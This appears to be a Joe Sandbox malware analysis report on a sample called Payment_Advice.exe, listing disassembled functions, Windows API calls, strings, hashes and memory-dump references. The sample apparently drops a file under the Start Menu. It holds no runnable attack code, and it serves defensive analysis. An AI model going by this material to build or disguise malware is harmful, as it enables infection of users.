Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]$p]B$peB
API String ID: 1265525490-3322868524
Opcode ID: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction ID: 0cb0380f10309b38a88638d348484b434b9e263fedf19fa463d2a85e12a62083
Opcode Fuzzy Hash: 6ada627b1bf3b80d97c94aeeab690a13cb6367ef01103192a9b7a9c8b7587d18
Instruction Fuzzy Hash: 09410571604B197FD2206B716C4DF6B3A6CEF45714F14413BBA01B62D2E638AC018E7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,004281E0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction ID: 126a239e0572de30fb8c34ac70cebce50066b6690b2383a097db7944ba687981
Opcode Fuzzy Hash: 0e57b95dfdd8f299c9740ed801e1ea7310e3bc8a8783e459bd01da44e8a50aec
Instruction Fuzzy Hash: DA419A71804249AFCB058FA5DD459BFBFB9FF48310F00802AF951AA1A0C738EA51DFA5

Function 0040617C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
CharNextW.USER32(?,?,?,00000000), ref: 004061EE
CharNextW.USER32(?,"C:\Users\user\Desktop\Payment_Advice.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206

Strings

*?|<>/":, xrefs: 004061CE
"C:\Users\user\Desktop\Payment_Advice.exe", xrefs: 004061C0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040617D, 00406182

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Payment_Advice.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1704388407
Opcode ID: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction ID: 7432597920acc0cf63456e540fa2db4f3ec2516b3ebf296f4b2d54ebc9aa4c6f
Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD

Function 00404194 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004041B1
GetSysColor.USER32(00000000), ref: 004041CD
SetTextColor.GDI32(?,00000000), ref: 004041D9
SetBkMode.GDI32(?,?), ref: 004041E5
GetSysColor.USER32(?), ref: 004041F8
SetBkColor.GDI32(?,?), ref: 00404208
DeleteObject.GDI32(?), ref: 00404222
CreateBrushIndirect.GDI32(?), ref: 0040422C

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25

Function 00402571 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 142fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402614
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402637
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264D

Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,0040BE78,0040330A,00409230,00409230,004031FC,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?), ref: 00405BEB

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

Strings

9, xrefs: 004025BC

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: File$ByteCharMultiReadWide$Pointerwsprintf
String ID: 9
API String ID: 1149667376-2366072709
Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69

Function 004027B3 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
GlobalFree.KERNEL32(00000000), ref: 00402875
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9

Function 004024EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 0040252D
lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,?,?,0040A580,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000400,?,?,00000021), ref: 00402534
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor,00000000,?,?,00000000,00000011), ref: 00402566

Strings

8, xrefs: 0040250A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 004024F8, 00402519, 00402523, 00402533, 0040255A

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1453599865-3010710425
Opcode ID: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
Opcode Fuzzy Hash: 8df9bcebfee30d523b4d05eba5c8466e9f12b895b6ea053821cc6f3642f20196
Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E

Function 00402D18 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D33
GetTickCount.KERNEL32 ref: 00402D51
wsprintfW.USER32 ref: 00402D7F

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
ShowWindow.USER32(00000000,00000005), ref: 00402DB1

Part of subcall function 00402CFC: MulDiv.KERNEL32(0002C8A5,00000064,00031420), ref: 00402D11

Strings

... %d%%, xrefs: 00402D79

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
Opcode Fuzzy Hash: 05583ad892283c0780e81c4539ecbfd5aa97a15968b20a28e9ee239037342e8f
Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E

Function 00404A5C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
GetMessagePos.USER32 ref: 00404A7F
ScreenToClient.USER32(?,?), ref: 00404A99
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1

Strings

f, xrefs: 00404AAD

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5

Function 00402C7D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9B
wsprintfW.USER32 ref: 00402CCF
SetWindowTextW.USER32(?,?), ref: 00402CDF
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1

Strings

verifying installer: %d%%, xrefs: 00402CC4
unpacking data: %d%%, xrefs: 00402CBD, 00402CCD

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
Opcode Fuzzy Hash: d7bffbabd43bed6f80f3ea12369d059a6d54d56d699175606d73747784c80188
Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
